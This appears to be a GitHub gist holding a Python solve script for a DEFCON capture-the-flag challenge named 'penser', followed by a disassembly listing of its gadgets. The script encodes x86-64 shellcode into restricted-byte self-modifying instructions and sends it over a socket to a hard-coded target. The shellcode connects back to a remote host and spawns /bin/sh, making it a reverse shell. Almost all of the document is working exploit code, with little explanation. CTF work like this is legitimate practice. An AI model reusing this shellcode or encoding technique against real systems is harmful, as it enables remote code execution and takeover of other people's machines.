Skip to content

Instantly share code, notes, and snippets.

@potetisensei

potetisensei/solve.py Secret

Created February 19, 2014 07:04
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save potetisensei/9087342 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save potetisensei/9087342 to your computer and use it in GitHub Desktop.
Download ZIP
DEFCON Writeup penser
Raw
solve.py
from socket import *
from commands import getoutput
from struct import pack
zero_nop = "\x00\x66\x00" # add [rsi+0x0],ah
nop = "\x25\x00\x0A\x00\x0A"# and eax,0xa000a00
another_zero_nop = "\x00\x42\x00" # add [rdx+0x0],al
payload = ""
shellcode = 'H1\xd2H1\xc0\xb2\x02H\x89\xd7\xb2\x01H\x89\xd6\xb2\x06\xb0)\x0f\x05H\x89\xc7H1\xc0P\xbb\x80\x01\x01\x02\x81\xeb\x01\x01\x01\x01H\xc1\xe3 f\xb8\x11\\\xc1\xe0\x10\xb0\x02H\t\xd8PH\x89\xe6H1\xd2\xb2\x10H1\xc0\xb0*\x0f\x05H1\xf6H1\xc0\xb0!\x0f\x05H1\xc0\xb0!H\xff\xc6\x0f\x05H1\xc0\xb0!H\xff\xc6\x0f\x05H1\xf6H1\xd2RH\xbf//bin/shWH\x89\xe7H1\xc0\xb0;\x0f\x05'
header = ""
header += "\x56"
header += another_zero_nop
header += "\x5B"
header += another_zero_nop
header += "\x52"
header += "\x00\x42\x00"
header += "\x5E"
header += zero_nop
header += "\x53"
header += zero_nop
header += "\x54"
header += zero_nop
header += "\x5D"
header += "\x00\x5D\x00"
header += nop
header += "\x00\x5D\x00"
header += nop
header += "\x00\x5D\x00"
header += "\x59"
header += zero_nop
header += "\x51"
header += zero_nop
header += "\x54"
header += zero_nop
header += "\x5D"
header += "\x00\x4D\x00"
header += nop
header += "\x00\x4D\x00"
header += nop
header += "\x00\x4D\x00"
header += "\x5A"
header += zero_nop
header += "\x52"
header += zero_nop
header += "\x54"
header += zero_nop
header += "\x5D"
header += "\x00\x55\x00"
header += nop
header += "\x00\x55\x00"
header += nop
header += "\x00\x55\x00"
header += "\x5F"
header += zero_nop
offset1_header = ""
offset1_header += "\x56"
offset1_header += zero_nop
offset1_header += "\x54"
offset1_header += zero_nop
offset1_header += "\x54"
offset1_header += zero_nop
offset1_header += "\x5d"
offset1_header += "\x00\x5d\x00"
offset1_header += "\x5d"
offset1_header += zero_nop
offset1_dic = ["\x48\x00\x5D\x00", "\x48\x00\x4D\x00", "\x48\x00\x55\x00", "\x48\x00\x7D\x00"]
offset1_footer = ""
offset1_footer += "\x5e"
offset1_footer += zero_nop
offset2_header = ""
offset2_header += "\x56"
offset2_header += zero_nop
offset2_header += "\x54"
offset2_header += zero_nop
offset2_header += "\x5d"
offset2_header += zero_nop
offset2_dic = ["\x48\x00\x5D\x00", "\x48\x00\x4D\x00", "\x48\x00\x55\x00", "\x48\x00\x7D\x00"]
offset2_footer = ""
offset2_footer += "\x5e"
offset2_footer += zero_nop
store_dic = ["\x40\x00\x5E\x00", "\x40\x00\x4E\x00", "\x40\x00\x56\x00", "\x40\x00\x7E\x00" ]
increment = ""
increment += "\x56"
increment += zero_nop
increment += "\x54"
increment += zero_nop
increment += "\x5d"
increment += "\x00\x5d\x00"
increment += "\x5e"
increment += zero_nop
footer = ""
footer += "\x55"
footer += zero_nop
footer += "\x58"
body = ""
for i in shellcode:
num = ord(i)
for j in range(4)[::-1]:
times, num = divmod(num, (4 ** j))
body += store_dic[j] * times
body += increment
offset1 = ""
offset1 += offset1_header
num = len(header) + len(body) + len(offset1_header) + len(offset1_footer) + len(offset2_header) + len(offset2_footer) + len(footer) + 48
num /= 0x100
for i in range(4)[::-1]:
times, num = divmod(num, (4 ** i))
offset1 += offset1_dic[i] * times
offset1 += offset1_footer
offset2 = ""
offset2 += offset2_header
num = len(header) + len(body) + len(offset1) + len(offset2_header) + len(offset2_footer) + len(footer) + 36
num %= 0x100
for i in range(4)[::-1]:
times, num = divmod(num, (4 ** i))
offset2 += offset2_dic[i] * times
offset2 += offset1_footer
payload += header
payload += offset1
payload += offset2
payload += body
payload += footer
open("check", "wb").write(payload)
sendee = payload.replace("\x00", "")
t = socket(AF_INET, SOCK_STREAM)
t.connect(("192.168.174.187", 8273))
t.sendall(pack("<I", len(sendee)))
t.sendall(sendee)
"""
header:
00000000 56 push rsi
00000001 5B pop rbx
00000002 52 push rdx
00000003 004200 add [rdx+0x0],al
00000006 5E pop rsi
00000007 53 push rbx
00000008 54 push rsp
00000009 5D pop rbp
0000000A 005D00 add [rbp+0x0],bl
0000000D 005D00 add [rbp+0x0],bl
00000010 005D00 add [rbp+0x0],bl
00000013 59 pop rcx
00000014 51 push rcx
00000015 54 push rsp
00000016 5D pop rbp
00000017 004D00 add [rbp+0x0],cl
0000001A 004D00 add [rbp+0x0],cl
0000001D 004D00 add [rbp+0x0],cl
00000020 5A pop rdx
00000021 52 push rdx
00000022 54 push rsp
00000023 5D pop rbp
00000024 005500 add [rbp+0x0],dl
00000027 005500 add [rbp+0x0],dl
0000002A 005500 add [rbp+0x0],dl
0000002D 5F pop rdi
offset1_header:
00000000 56 push rsi
00000001 54 push rsp
00000002 54 push rsp
00000003 5D pop rbp
00000004 005D00 add [rbp+0x0],bl
00000007 5D pop rbp
offset1_dic:
00000000 48005D00 o64 add [rbp+0x0],bl
00000000 48004D00 o64 add [rbp+0x0],cl
00000000 48005500 o64 add [rbp+0x0],dl
00000000 48007D00 o64 add [rbp+0x0],dil
offset1_footer:
00000000 5E pop rsi
offset2_header:
00000000 56 push rsi
00000001 54 push rsp
00000002 5D pop rbp
offset2_footer:
00000000 5E pop rsi
store_dic:
00000000 40005E00 add [rsi+0x0],bl
00000000 40004E00 add [rsi+0x0],cl
00000000 40005600 add [rsi+0x0],dl
00000000 40007E00 add [rsi+0x0],dil
increment:
00000000 56 push rsi
00000001 54 push rsp
00000002 5D pop rbp
00000003 005D00 add [rbp+0x0],bl
00000006 5E pop rsi
footer:
00000000 55 push rbp
00000001 58 pop rax
"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment